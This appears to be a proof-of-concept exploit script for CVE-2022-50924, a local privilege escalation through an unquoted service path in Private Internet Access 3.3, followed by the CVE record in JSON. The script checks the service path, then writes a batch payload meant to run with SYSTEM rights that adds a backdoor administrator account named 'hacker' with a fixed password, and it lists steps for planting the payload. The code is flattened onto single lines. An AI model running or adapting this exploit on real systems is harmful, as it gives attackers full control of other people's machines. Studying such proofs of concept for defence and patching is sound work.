CVE-2022-50924

#!/usr/bin/env python3 # CVE-2022-50924 PoC - Private Internet Access Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in PIA 3.3 # Author: Security Researcher # Note: For educational and authorized testing purposes only import os import sys import subprocess import time def check_vulnerability(): """ Check if the system is vulnerable to CVE-2022-50924 Checks the PIA service configuration for unquoted paths """ try: # Query the PIA service configuration using sc command result = subprocess.run( ['sc', 'qc', 'pia_service'], capture_output=True, text=True, timeout=10 ) if result.returncode == 0: output = result.stdout # Check if BINARY_PATH_NAME contains unquoted path with spaces if 'BINARY_PATH_NAME' in output: for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if ':' in line else line.strip() print(f"[+] Found PIA service path: {path}") # Check for unquoted path with spaces if not path.startswith('"') and ' ' in path: print("[!] VULNERABLE: Path is not quoted and contains spaces") print("[!] This allows path hijacking via space-separated directories") return True else: print("[-] NOT VULNERABLE: Path is properly quoted") return False else: print("[-] PIA service not found on this system") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False def create_payload(payload_path): """ Create a malicious executable that will be placed in the unquoted path This creates a simple reverse shell or command execution payload """ try: # Check if we can write to the target directory target_dir = os.path.dirname(payload_path) # For demonstration, create a simple batch script as payload # In real attack, this would be a compiled executable payload_script = f"""@echo off echo [CVE-2022-50924] Payload executed with SYSTEM privileges > C:\\pwned.txt net user hacker P@ssw0rd123 /add net localgroup administrators hacker /add echo Privilege Escalation Successful > C:\\escalation.txt """ with open(payload_path.replace('.exe', '.bat'), 'w') as f: f.write(payload_script) print(f"[+] Payload created: {payload_path.replace('.exe', '.bat')}") return True except PermissionError: print("[-] Permission denied: Cannot write to target directory") print("[-] This might indicate proper permissions or non-vulnerable configuration") return False except Exception as e: print(f"[-] Error creating payload: {e}") return False def main(): print("="*60) print("CVE-2022-50924 - Private Internet Access Unquoted Service Path") print("="*60) print() # Step 1: Check if system is vulnerable print("[*] Step 1: Checking if system is vulnerable...") if check_vulnerability(): print("[+] System appears to be vulnerable") # Step 2: Demonstrate exploitation (requires elevated privileges) print("\n[*] Step 2: To exploit this vulnerability:") print(" 1. Place a malicious executable in a directory along the service path") print(" 2. Common targets: C:\\Program.exe or C:\\Program Files\") print(" 3. Wait for service restart or system reboot") print(" 4. Malicious code executes with SYSTEM privileges") # Example payload path (would need to match actual service path) example_payload = "C:\\Program.exe" print(f"\n[*] Example payload location: {example_payload}") create_payload(example_payload) else: print("[-] System does not appear to be vulnerable") print("[-] Either PIA is not installed or service path is properly quoted") print("\n[*] Remediation: Update Private Internet Access to latest version") print("[*] Download: https://www.privateinternetaccess.com/download") print("="*60) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2022-50924", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:56.503", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Private Internet Access 3.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Private Internet Access 3.3 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas en la configuración del servicio para inyectar código malicioso que se ejecutaría con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50804", "source": "[email protected]"}, {"url": "https://www.privateinternetaccess.com", "source": "[email protected]"}, {"url": "https://www.privateinternetaccess.com/download", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/private-internet-access-pia-service-unquoted-service-path", "source": "[email protected]"}]}}